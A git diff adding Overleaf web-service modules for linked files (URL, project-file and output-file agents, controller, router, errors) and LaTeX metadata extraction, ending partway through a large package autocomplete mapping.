FileTooLargeError, + OError, +} from '../Errors/Errors.js' +import Modules from '../../infrastructure/Modules.js' +import { plainTextResponse } from '../../infrastructure/Response.js' +import ReferencesHandler from '../References/ReferencesHandler.mjs' +import EditorRealTimeController from '../Editor/EditorRealTimeController.js' +import { expressify } from '@overleaf/promise-utils' +import ProjectOutputFileAgent from './ProjectOutputFileAgent.mjs' +import ProjectFileAgent from './ProjectFileAgent.js' +import UrlAgent from './UrlAgent.mjs' + +let LinkedFilesController + +async function createLinkedFile(req, res, next) { + const { project_id: projectId } = req.params + const { name, provider, data, parent_folder_id: parentFolderId } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + + const Agent = await LinkedFilesController._getAgent(provider) + if (Agent == null) { + return res.sendStatus(400) + } + + data.provider = provider + data.importedAt = new Date().toISOString() + + try { + const newFileId = await Agent.promises.createLinkedFile( + projectId, + data, + name, + parentFolderId, + userId + ) + if (name.endsWith('.bib')) { + AnalyticsManager.recordEventForUserInBackground( + userId, + 'linked-bib-file', + { + integration: provider, + } + ) + } + return res.json({ new_file_id: newFileId }) + } catch (err) { + return LinkedFilesController.handleError(err, req, res, next) + } +} + +async function refreshLinkedFile(req, res, next) { + const { project_id: projectId, file_id: fileId } = req.params + const userId = SessionManager.getLoggedInUserId(req.session) + + const { file, parentFolder } = await LinkedFilesHandler.promises.getFileById( + projectId, + fileId + ) + + if (file == null) { + return res.sendStatus(404) + } + const { name } = file + const { linkedFileData } = file + if ( + linkedFileData == null || + (linkedFileData != null ? linkedFileData.provider : undefined) == null + ) { + return res.sendStatus(409) + } + + const { provider } = linkedFileData + const parentFolderId = parentFolder._id + const Agent = await LinkedFilesController._getAgent(provider) + if (Agent == null) { + return res.sendStatus(400) + } + + linkedFileData.importedAt = new Date().toISOString() + let newFileId + try { + newFileId = await Agent.promises.refreshLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId + ) + } catch (err) { + return LinkedFilesController.handleError(err, req, res, next) + } + + if (req.body.shouldReindexReferences) { + let data + try { + data = await ReferencesHandler.promises.indexAll(projectId) + } catch (error) { + OError.tag(error, 'failed to index references', { + projectId, + }) + return next(error) + } + EditorRealTimeController.emitToRoom( + projectId, + 'references:keys:updated', + data.keys, + true + ) + res.json({ new_file_id: newFileId }) + } else { + res.json({ new_file_id: newFileId }) + } +} + +export default LinkedFilesController = { + Agents: null, + + async _cacheAgents() { + if (!LinkedFilesController.Agents) { + LinkedFilesController.Agents = _.extend( + { + url: UrlAgent, + project_file: ProjectFileAgent, + project_output_file: ProjectOutputFileAgent, + }, + await Modules.linkedFileAgentsIncludes() + ) + } + }, + + async _getAgent(provider) { + await LinkedFilesController._cacheAgents() + if ( + !Object.prototype.hasOwnProperty.call( + LinkedFilesController.Agents, + provider + ) + ) { + return null + } + if (!Array.from(Settings.enabledLinkedFileTypes).includes(provider)) { + return null + } + return LinkedFilesController.Agents[provider] + }, + + createLinkedFile: expressify(createLinkedFile), + + refreshLinkedFile: expressify(refreshLinkedFile), + + handleError(error, req, res, next) { + if (error instanceof AccessDeniedError) { + res.status(403) + plainTextResponse( + res, + res.locals.translate( + 'the_project_that_contains_this_file_is_not_shared_with_you' + ) + ) + } else if (error instanceof BadDataError) { + res.status(400) + plainTextResponse(res, 'The submitted data is not valid') + } else if (error instanceof BadEntityTypeError) { + res.status(400) + plainTextResponse(res, 'The file is the wrong type') + } else if (error instanceof SourceFileNotFoundError) { + res.status(404) + plainTextResponse(res, 'Source file not found') + } else if (error instanceof ProjectNotFoundError) { + res.status(404) + plainTextResponse(res, 'Project not found') + } else if (error instanceof V1ProjectNotFoundError) { + res.status(409) + plainTextResponse( + res, + 'Sorry, the source project is not yet imported to Overleaf v2. Please import it to Overleaf v2 to refresh this file' + ) + } else if (error instanceof CompileFailedError) { + res.status(422) + plainTextResponse( + res, + res.locals.translate('generic_linked_file_compile_error') + ) + } else if (error instanceof OutputFileFetchFailedError) { + res.status(404) + plainTextResponse(res, 'Could not get output file') + } else if (error instanceof UrlFetchFailedError) { + res.status(422) + if (error.cause instanceof FileTooLargeError) { + plainTextResponse(res, 'File too large') + } else { + plainTextResponse( + res, + `Your URL could not be reached (${ + error.info?.status || error.cause?.info?.status + } status code). Please check it and try again.` + ) + } + } else if (error instanceof InvalidUrlError) { + res.status(422) + plainTextResponse( + res, + 'Your URL is not valid. Please check it and try again.' + ) + } else if (error instanceof NotOriginalImporterError) { + res.status(400) + plainTextResponse( + res, + 'You are not the user who originally imported this file' + ) + } else if (error instanceof FeatureNotAvailableError) { + res.status(400) + plainTextResponse(res, 'This feature is not enabled on your account') + } else if (error instanceof RemoteServiceError) { + if (error.info?.statusCode === 403) { + res.status(400).json({ relink: true }) + } else { + res.status(502) + plainTextResponse(res, 'The remote service produced an error') + } + } else if (error instanceof FileCannotRefreshError) { + res.status(400) + plainTextResponse(res, 'This file cannot be refreshed') + } else if (error.message === 'project_has_too_many_files') { + res.status(400) + plainTextResponse(res, 'too many files') + } else if (/\bECONNREFUSED\b/.test(error.message)) { + res.status(500) + plainTextResponse(res, 'Importing references is not currently available') + } else if (error instanceof FileTooLargeError) { + res.status(422) + plainTextResponse(res, 'File too large') + } else { + next(error) + } + }, +} diff --git a/services/web/app/src/Features/LinkedFiles/LinkedFilesErrors.js b/services/web/app/src/Features/LinkedFiles/LinkedFilesErrors.js new file mode 100644 index 0000000..f74152f --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/LinkedFilesErrors.js @@ -0,0 +1,43 @@ +const { BackwardCompatibleError } = require('../Errors/Errors') + +class UrlFetchFailedError extends BackwardCompatibleError {} + +class InvalidUrlError extends BackwardCompatibleError {} + +class CompileFailedError extends BackwardCompatibleError {} + +class AccessDeniedError extends BackwardCompatibleError {} + +class BadEntityTypeError extends BackwardCompatibleError {} + +class BadDataError extends BackwardCompatibleError {} + +class ProjectNotFoundError extends BackwardCompatibleError {} + +class V1ProjectNotFoundError extends BackwardCompatibleError {} + +class SourceFileNotFoundError extends BackwardCompatibleError {} + +class NotOriginalImporterError extends BackwardCompatibleError {} + +class FeatureNotAvailableError extends BackwardCompatibleError {} + +class RemoteServiceError extends BackwardCompatibleError {} + +class FileCannotRefreshError extends BackwardCompatibleError {} + +module.exports = { + CompileFailedError, + UrlFetchFailedError, + InvalidUrlError, + AccessDeniedError, + BadEntityTypeError, + BadDataError, + ProjectNotFoundError, + V1ProjectNotFoundError, + SourceFileNotFoundError, + NotOriginalImporterError, + FeatureNotAvailableError, + RemoteServiceError, + FileCannotRefreshError, +} diff --git a/services/web/app/src/Features/LinkedFiles/LinkedFilesHandler.js b/services/web/app/src/Features/LinkedFiles/LinkedFilesHandler.js new file mode 100644 index 0000000..a12f27f --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/LinkedFilesHandler.js @@ -0,0 +1,108 @@ +const FileWriter = require('../../infrastructure/FileWriter') +const EditorController = require('../Editor/EditorController') +const ProjectLocator = require('../Project/ProjectLocator') +const { Project } = require('../../models/Project') +const ProjectGetter = require('../Project/ProjectGetter') +const { + ProjectNotFoundError, + V1ProjectNotFoundError, + BadDataError, +} = require('./LinkedFilesErrors') +const { callbackifyAll } = require('@overleaf/promise-utils') + +const LinkedFilesHandler = { + async getFileById(projectId, fileId) { + const { element, path, folder } = await ProjectLocator.promises.findElement( + { + project_id: projectId, + element_id: fileId, + type: 'file', + } + ) + return { file: element, path, parentFolder: folder } + }, + + async getSourceProject(data) { + const projection = { _id: 1, name: 1, overleaf: 1 } // include the historyId for future use + if (data.v1_source_doc_id != null) { + const project = await Project.findOne( + { 'overleaf.id': data.v1_source_doc_id }, + projection + ).exec() + + if (project == null) { + throw new V1ProjectNotFoundError() + } + + return project + } else if (data.source_project_id != null) { + const project = await ProjectGetter.promises.getProject( + data.source_project_id, + projection + ) + + if (project == null) { + throw new ProjectNotFoundError() + } + + return project + } else { + throw new BadDataError('neither v1 nor v2 id present') + } + }, + + async importFromStream( + projectId, + readStream, + linkedFileData, + name, + parentFolderId, + userId + ) { + const fsPath = await FileWriter.promises.writeStreamToDisk( + projectId, + readStream + ) + + return await EditorController.promises.upsertFile( + projectId, + parentFolderId, + name, + fsPath, + linkedFileData, + 'upload', + userId + ) + }, + + async importContent( + projectId, + content, + linkedFileData, + name, + parentFolderId, + userId + ) { + const fsPath = await FileWriter.promises.writeContentToDisk( + projectId, + content + ) + + return await EditorController.promises.upsertFile( + projectId, + parentFolderId, + name, + fsPath, + linkedFileData, + 'upload', + userId + ) + }, +} + +module.exports = { + promises: LinkedFilesHandler, + ...callbackifyAll(LinkedFilesHandler, { + multiResult: { getFileById: ['file', 'path', 'parentFolder'] }, + }), +} diff --git a/services/web/app/src/Features/LinkedFiles/LinkedFilesRouter.mjs b/services/web/app/src/Features/LinkedFiles/LinkedFilesRouter.mjs new file mode 100644 index 0000000..53b49d0 --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/LinkedFilesRouter.mjs @@ -0,0 +1,47 @@ +import AuthorizationMiddleware from '../Authorization/AuthorizationMiddleware.js' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import LinkedFilesController from './LinkedFilesController.mjs' +import { validate, Joi } from '../../infrastructure/Validation.js' + +const rateLimiters = { + createLinkedFile: new RateLimiter('create-linked-file', { + points: 100, + duration: 60, + }), + refreshLinkedFile: new RateLimiter('refresh-linked-file', { + points: 100, + duration: 60, + }), +} + +export default { + apply(webRouter) { + webRouter.post( + '/project/:project_id/linked_file', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + RateLimiterMiddleware.rateLimit(rateLimiters.createLinkedFile, { + params: ['project_id'], + }), + validate({ + body: { + name: Joi.string().required(), + // TODO: validate the remaining properties + }, + }), + LinkedFilesController.createLinkedFile + ) + + webRouter.post( + '/project/:project_id/linked_file/:file_id/refresh', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + RateLimiterMiddleware.rateLimit(rateLimiters.refreshLinkedFile, { + params: ['project_id'], + }), + LinkedFilesController.refreshLinkedFile + ) + }, +} diff --git a/services/web/app/src/Features/LinkedFiles/ProjectFileAgent.js b/services/web/app/src/Features/LinkedFiles/ProjectFileAgent.js new file mode 100644 index 0000000..03227d1 --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/ProjectFileAgent.js @@ -0,0 +1,266 @@ +/* eslint-disable + n/handle-callback-err, + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ProjectFileAgent +const AuthorizationManager = require('../Authorization/AuthorizationManager') +const ProjectLocator = require('../Project/ProjectLocator') +const DocstoreManager = require('../Docstore/DocstoreManager') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const FileStoreHandler = require('../FileStore/FileStoreHandler') +const _ = require('lodash') +const LinkedFilesHandler = require('./LinkedFilesHandler') +const { + BadDataError, + AccessDeniedError, + BadEntityTypeError, + SourceFileNotFoundError, +} = require('./LinkedFilesErrors') +const { promisify } = require('@overleaf/promise-utils') + +module.exports = ProjectFileAgent = { + createLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId, + callback + ) { + if (!ProjectFileAgent._canCreate(linkedFileData)) { + return callback(new AccessDeniedError()) + } + return ProjectFileAgent._go( + projectId, + linkedFileData, + name, + parentFolderId, + userId, + callback + ) + }, + + refreshLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId, + callback + ) { + return ProjectFileAgent._go( + projectId, + linkedFileData, + name, + parentFolderId, + userId, + callback + ) + }, + + _prepare(projectId, linkedFileData, userId, callback) { + if (callback == null) { + callback = function () {} + } + return ProjectFileAgent._checkAuth( + projectId, + linkedFileData, + userId, + (err, allowed) => { + if (err != null) { + return callback(err) + } + if (!allowed) { + return callback(new AccessDeniedError()) + } + if (!ProjectFileAgent._validate(linkedFileData)) { + return callback(new BadDataError()) + } + return callback(null, linkedFileData) + } + ) + }, + + _go(projectId, linkedFileData, name, parentFolderId, userId, callback) { + linkedFileData = ProjectFileAgent._sanitizeData(linkedFileData) + return ProjectFileAgent._prepare( + projectId, + linkedFileData, + userId, + (err, linkedFileData) => { + if (err != null) { + return callback(err) + } + if (!ProjectFileAgent._validate(linkedFileData)) { + return callback(new BadDataError()) + } + return ProjectFileAgent._getEntity( + linkedFileData, + userId, + (err, sourceProject, entity, type) => { + if (err != null) { + return callback(err) + } + if (type === 'doc') { + return DocstoreManager.getDoc( + sourceProject._id, + entity._id, + function (err, lines) { + if (err != null) { + return callback(err) + } + return LinkedFilesHandler.importContent( + projectId, + lines.join('\n'), + linkedFileData, + name, + parentFolderId, + userId, + function (err, file) { + if (err != null) { + return callback(err) + } + return callback(null, file._id) + } + ) + } + ) // Created + } else if (type === 'file') { + return FileStoreHandler.getFileStreamNew( + sourceProject, + entity, + null, + function (err, fileStream) { + if (err != null) { + return callback(err) + } + return LinkedFilesHandler.importFromStream( + projectId, + fileStream, + linkedFileData, + name, + parentFolderId, + userId, + function (err, file) { + if (err != null) { + return callback(err) + } + return callback(null, file._id) + } + ) + } + ) // Created + } else { + return callback(new BadEntityTypeError()) + } + } + ) + } + ) + }, + + _getEntity(linkedFileData, currentUserId, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) + const { source_entity_path: sourceEntityPath } = linkedFileData + return ProjectFileAgent._getSourceProject( + linkedFileData, + function (err, project) { + if (err != null) { + return callback(err) + } + const sourceProjectId = project._id + return DocumentUpdaterHandler.flushProjectToMongo( + sourceProjectId, + function (err) { + if (err != null) { + return callback(err) + } + return ProjectLocator.findElementByPath( + { + project_id: sourceProjectId, + path: sourceEntityPath, + exactCaseMatch: true, + }, + function (err, entity, type) { + if (err != null) { + if (/^not found.*/.test(err.message)) { + err = new SourceFileNotFoundError() + } + return callback(err) + } + return callback(null, project, entity, type) + } + ) + } + ) + } + ) + }, + + _sanitizeData(data) { + return _.pick( + data, + 'provider', + 'source_project_id', + 'v1_source_doc_id', + 'source_entity_path', + 'importedAt' + ) + }, + + _validate(data) { + return ( + (data.source_project_id != null || data.v1_source_doc_id != null) && + data.source_entity_path != null + ) + }, + + _canCreate(data) { + // Don't allow creation of linked-files with v1 doc ids + return data.v1_source_doc_id == null + }, + + _getSourceProject: LinkedFilesHandler.getSourceProject, + + _checkAuth(projectId, data, currentUserId, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) + if (!ProjectFileAgent._validate(data)) { + return callback(new BadDataError()) + } + return ProjectFileAgent._getSourceProject(data, function (err, project) { + if (err != null) { + return callback(err) + } + return AuthorizationManager.canUserReadProject( + currentUserId, + project._id, + null, + function (err, canRead) { + if (err != null) { + return callback(err) + } + return callback(null, canRead) + } + ) + }) + }, +} + +ProjectFileAgent.promises = { + createLinkedFile: promisify(ProjectFileAgent.createLinkedFile), + refreshLinkedFile: promisify(ProjectFileAgent.refreshLinkedFile), +} diff --git a/services/web/app/src/Features/LinkedFiles/ProjectOutputFileAgent.mjs b/services/web/app/src/Features/LinkedFiles/ProjectOutputFileAgent.mjs new file mode 100644 index 0000000..0af62b2 --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/ProjectOutputFileAgent.mjs @@ -0,0 +1,236 @@ +import AuthorizationManager from '../Authorization/AuthorizationManager.js' +import CompileManager from '../Compile/CompileManager.js' +import ClsiManager from '../Compile/ClsiManager.js' +import ProjectFileAgent from './ProjectFileAgent.js' +import _ from 'lodash' +import { + CompileFailedError, + BadDataError, + AccessDeniedError, +} from './LinkedFilesErrors.js' +import { OutputFileFetchFailedError } from '../Errors/Errors.js' +import LinkedFilesHandler from './LinkedFilesHandler.js' +import { promisify } from '@overleaf/promise-utils' + +function _prepare(projectId, linkedFileData, userId, callback) { + _checkAuth(projectId, linkedFileData, userId, (err, allowed) => { + if (err) { + return callback(err) + } + if (!allowed) { + return callback(new AccessDeniedError()) + } + if (!_validate(linkedFileData)) { + return callback(new BadDataError()) + } + callback(null, linkedFileData) + }) +} + +function createLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId, + callback +) { + if (!ProjectFileAgent._canCreate(linkedFileData)) { + return callback(new AccessDeniedError()) + } + linkedFileData = _sanitizeData(linkedFileData) + _prepare(projectId, linkedFileData, userId, (err, linkedFileData) => { + if (err) { + return callback(err) + } + _getFileStream(linkedFileData, userId, (err, readStream) => { + if (err) { + return callback(err) + } + LinkedFilesHandler.importFromStream( + projectId, + readStream, + linkedFileData, + name, + parentFolderId, + userId, + (err, file) => { + if (err) { + return callback(err) + } + callback(null, file._id) + } + ) + }) + }) +} + +function refreshLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId, + callback +) { + _prepare(projectId, linkedFileData, userId, (err, linkedFileData) => { + if (err) { + return callback(err) + } + _compileAndGetFileStream( + linkedFileData, + userId, + (err, readStream, newBuildId) => { + if (err) { + return callback(err) + } + linkedFileData.build_id = newBuildId + LinkedFilesHandler.importFromStream( + projectId, + readStream, + linkedFileData, + name, + parentFolderId, + userId, + (err, file) => { + if (err) { + return callback(err) + } + callback(null, file._id) + } + ) + } + ) + }) +} + +function _sanitizeData(data) { + return { + provider: data.provider, + source_project_id: data.source_project_id, + source_output_file_path: data.source_output_file_path, + build_id: data.build_id, + clsiServerId: data.clsiServerId, + importedAt: data.importedAt, + } +} + +function _validate(data) { + return ( + (data.v1_source_doc_id != null && data.source_output_file_path != null) || + (data.source_project_id != null && + data.source_output_file_path != null && + data.build_id != null) + ) +} + +function _checkAuth(projectId, data, currentUserId, callback) { + callback = _.once(callback) + if (!_validate(data)) { + return callback(new BadDataError()) + } + LinkedFilesHandler.getSourceProject(data, (err, project) => { + if (err) { + return callback(err) + } + AuthorizationManager.canUserReadProject( + currentUserId, + project._id, + null, + (err, canRead) => { + if (err) { + return callback(err) + } + callback(null, canRead) + } + ) + }) +} + +function _getFileStream(linkedFileData, userId, callback) { + callback = _.once(callback) + const { + source_output_file_path: sourceOutputFilePath, + build_id: buildId, + clsiServerId, + } = linkedFileData + LinkedFilesHandler.getSourceProject(linkedFileData, (err, project) => { + if (err) { + return callback(err) + } + const sourceProjectId = project._id + CompileManager.getProjectCompileLimits(sourceProjectId, (err, limits) => { + if (err) return callback(err) + + ClsiManager.getOutputFileStream( + sourceProjectId, + userId, + limits, + clsiServerId, + buildId, + sourceOutputFilePath, + (err, readStream) => { + if (err) { + return callback(err) + } + callback(null, readStream) + } + ) + }) + }) +} + +function _compileAndGetFileStream(linkedFileData, userId, callback) { + callback = _.once(callback) + const { source_output_file_path: sourceOutputFilePath } = linkedFileData + LinkedFilesHandler.getSourceProject(linkedFileData, (err, project) => { + if (err) { + return callback(err) + } + const sourceProjectId = project._id + CompileManager.compile( + sourceProjectId, + userId, + {}, + (err, status, outputFiles, clsiServerId, limits) => { + if (err) { + return callback(err) + } + if (status !== 'success') { + return callback(new CompileFailedError()) + } + const outputFile = _.find( + outputFiles, + o => o.path === sourceOutputFilePath + ) + if (outputFile == null) { + return callback(new OutputFileFetchFailedError()) + } + const buildId = outputFile.build + ClsiManager.getOutputFileStream( + sourceProjectId, + userId, + limits, + clsiServerId, + buildId, + sourceOutputFilePath, + (err, readStream) => { + if (err) { + return callback(err) + } + callback(null, readStream, buildId) + } + ) + } + ) + }) +} + +export default { + createLinkedFile, + refreshLinkedFile, + promises: { + createLinkedFile: promisify(createLinkedFile), + refreshLinkedFile: promisify(refreshLinkedFile), + }, +} diff --git a/services/web/app/src/Features/LinkedFiles/UrlAgent.mjs b/services/web/app/src/Features/LinkedFiles/UrlAgent.mjs new file mode 100644 index 0000000..12785d7 --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/UrlAgent.mjs @@ -0,0 +1,83 @@ +import logger from '@overleaf/logger' +import urlValidator from 'valid-url' +import { InvalidUrlError, UrlFetchFailedError } from './LinkedFilesErrors.js' +import LinkedFilesHandler from './LinkedFilesHandler.js' +import UrlHelper from '../Helpers/UrlHelper.js' +import { fetchStream, RequestFailedError } from '@overleaf/fetch-utils' +import { callbackify } from '@overleaf/promise-utils' +import { FileTooLargeError } from '../Errors/Errors.js' + +async function createLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId +) { + logger.info( + { projectId, userId, url: linkedFileData.url }, + 'create linked file' + ) + linkedFileData = _sanitizeData(linkedFileData) + const fetchUrl = _getUrl(projectId, linkedFileData, userId) + try { + const readStream = await fetchStream(fetchUrl) + const file = await LinkedFilesHandler.promises.importFromStream( + projectId, + readStream, + linkedFileData, + name, + parentFolderId, + userId + ) + return file._id + } catch (error) { + if (error instanceof RequestFailedError && /too large/.test(error.body)) { + throw new FileTooLargeError('file too large', { + url: linkedFileData.url, + }).withCause(error) + } + throw new UrlFetchFailedError('url fetch failed', { + url: linkedFileData.url, + }).withCause(error) + } +} + +async function refreshLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId +) { + return await createLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId + ) +} + +function _sanitizeData(data) { + return { + provider: data.provider, + url: UrlHelper.prependHttpIfNeeded(data.url), + importedAt: data.importedAt, + } +} + +function _getUrl(projectId, data, currentUserId) { + let { url } = data + if (!urlValidator.isWebUri(url)) { + throw new InvalidUrlError(`invalid url: ${url}`) + } + url = UrlHelper.wrapUrlWithProxy(url) + return url +} + +export default { + createLinkedFile: callbackify(createLinkedFile), + refreshLinkedFile: callbackify(refreshLinkedFile), + promises: { createLinkedFile, refreshLinkedFile }, +} diff --git a/services/web/app/src/Features/Metadata/MetaController.mjs b/services/web/app/src/Features/Metadata/MetaController.mjs new file mode 100644 index 0000000..417217e --- /dev/null +++ b/services/web/app/src/Features/Metadata/MetaController.mjs @@ -0,0 +1,61 @@ +import OError from '@overleaf/o-error' +import EditorRealTimeController from '../Editor/EditorRealTimeController.js' +import MetaHandler from './MetaHandler.mjs' +import logger from '@overleaf/logger' +import { expressify } from '@overleaf/promise-utils' + +async function getMetadata(req, res) { + const { project_id: projectId } = req.params + + logger.debug({ projectId }, 'getting all labels for project') + + let projectMeta + try { + projectMeta = await MetaHandler.promises.getAllMetaForProject(projectId) + } catch (error) { + throw OError.tag( + error, + '[MetaController] error getting all labels from project', + { + project_id: projectId, + } + ) + } + + res.json({ projectId, projectMeta }) +} + +async function broadcastMetadataForDoc(req, res) { + const { project_id: projectId } = req.params + const { doc_id: docId } = req.params + const { broadcast } = req.body + + logger.debug({ projectId, docId, broadcast }, 'getting labels for doc') + + let docMeta + try { + docMeta = await MetaHandler.promises.getMetaForDoc(projectId, docId) + } catch (error) { + throw OError.tag(error, '[MetaController] error getting labels from doc', { + project_id: projectId, + doc_id: docId, + }) + } + + // default to broadcasting, unless explicitly disabled (for backwards compatibility) + if (broadcast === false) { + return res.json({ docId, meta: docMeta }) + } + + EditorRealTimeController.emitToRoom(projectId, 'broadcastDocMeta', { + docId, + meta: docMeta, + }) + + res.sendStatus(200) // 204? +} + +export default { + getMetadata: expressify(getMetadata), + broadcastMetadataForDoc: expressify(broadcastMetadataForDoc), +} diff --git a/services/web/app/src/Features/Metadata/MetaHandler.mjs b/services/web/app/src/Features/Metadata/MetaHandler.mjs new file mode 100644 index 0000000..ef5d118 --- /dev/null +++ b/services/web/app/src/Features/Metadata/MetaHandler.mjs @@ -0,0 +1,132 @@ +import ProjectEntityHandler from '../Project/ProjectEntityHandler.js' +import DocumentUpdaterHandler from '../DocumentUpdater/DocumentUpdaterHandler.js' +import packageMapping from './packageMapping.mjs' +import { callbackify } from '@overleaf/promise-utils' + +/** @typedef {{ + * labels: string[] + * packages: Record<string, Record<string, any>>, + * packageNames: string[], + * }} DocMeta + */ + +/** + * @param {string[]} lines + * @return {Promise<DocMeta>} + */ +async function extractMetaFromDoc(lines) { + /** @type {DocMeta} */ + const docMeta = { + labels: [], + packages: {}, + packageNames: [], + } + + const labelRe = /\\label{(.{0,80}?)}/g + const labelOptionRe = /\blabel={?(.{0,80}?)[\s},\]]/g + const packageRe = /^\\usepackage(?:\[.{0,80}?])?{(.{0,80}?)}/g + const reqPackageRe = /^\\RequirePackage(?:\[.{0,80}?])?{(.{0,80}?)}/g + + for (const rawLine of lines) { + const line = getNonCommentedContent(rawLine) + + for (const label of lineMatches(labelRe, line)) { + docMeta.labels.push(label) + } + + for (const label of lineMatches(labelOptionRe, line)) { + docMeta.labels.push(label) + } + + for (const pkg of lineMatches(packageRe, line, ',')) { + docMeta.packageNames.push(pkg) + } + + for (const pkg of lineMatches(reqPackageRe, line, ',')) { + docMeta.packageNames.push(pkg) + } + } + + for (const packageName of docMeta.packageNames) { + if (packageMapping[packageName]) { + docMeta.packages[packageName] = packageMapping[packageName] + } + } + + return docMeta +} + +/** + * + * @param {RegExp} matchRe + * @param {string} line + * @param {string} [separator] + * @return {Generator<string>} + */ +function* lineMatches(matchRe, line, separator) { + let match + while ((match = matchRe.exec(line))) { + const matched = match[1].trim() + + if (matched) { + if (separator) { + const items = matched + .split(',') + .map(item => item.trim()) + .filter(Boolean) + + for (const item of items) { + yield item + } + } else { + yield matched + } + } + } +} + +/** + * @param {Record<{ lines: string[] }, any>} projectDocs + * @return {Promise<{}>} + */ +async function extractMetaFromProjectDocs(projectDocs) { + const projectMeta = {} + for (const doc of Object.values(projectDocs)) { + projectMeta[doc._id] = await extractMetaFromDoc(doc.lines) + } + return projectMeta +} + +/** + * Trims comment content from line + * @param {string} rawLine + * @returns {string} + */ +function getNonCommentedContent(rawLine) { + return rawLine.replace(/(^|[^\\])%.*/, '$1') +} + +async function getAllMetaForProject(projectId) { + await DocumentUpdaterHandler.promises.flushProjectToMongo(projectId) + + const docs = await ProjectEntityHandler.promises.getAllDocs(projectId) + + return await extractMetaFromProjectDocs(docs) +} + +async function getMetaForDoc(projectId, docId) { + await DocumentUpdaterHandler.promises.flushDocToMongo(projectId, docId) + + const { lines } = await ProjectEntityHandler.promises.getDoc(projectId, docId) + + return await extractMetaFromDoc(lines) +} + +export default { + promises: { + getAllMetaForProject, + getMetaForDoc, + }, + getAllMetaForProject: callbackify(getAllMetaForProject), + getMetaForDoc: callbackify(getMetaForDoc), +} diff --git a/services/web/app/src/Features/Metadata/packageMapping.mjs b/services/web/app/src/Features/Metadata/packageMapping.mjs new file mode 100644 index 0000000..2af10a0 --- /dev/null +++ b/services/web/app/src/Features/Metadata/packageMapping.mjs @@ -0,0 +1,71596 @@ +export default { + inputenc: [ + { + caption: '\\inputencoding{}', + snippet: '\\inputencoding{$1}', + meta: 'inputenc-cmd', + score: 0.0002447047447770061, + }, + ], + graphicx: [ + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'graphicx-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'graphicx-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'graphicx-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'graphicx-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'graphicx-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'graphicx-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'graphicx-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'graphicx-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'graphicx-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'graphicx-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'graphicx-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'graphicx-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'graphicx-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'graphicx-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'graphicx-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'graphicx-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'graphicx-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'graphicx-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'graphicx-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'graphicx-cmd', + score: 0.008565354665444157, + }, + ], + amsmath: [ + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'amsmath-cmd', + score: 0.0017755897148012264, + }, + { + 